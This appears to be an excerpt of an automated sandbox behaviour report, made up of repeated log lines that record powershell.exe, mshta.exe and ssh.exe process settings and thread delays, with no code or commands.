        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1448Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 797Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5772Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2008Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4924Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4759Jump to behavior
        Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 5268Thread sleep time: -922337203685477s >= -30000sJump to behavior
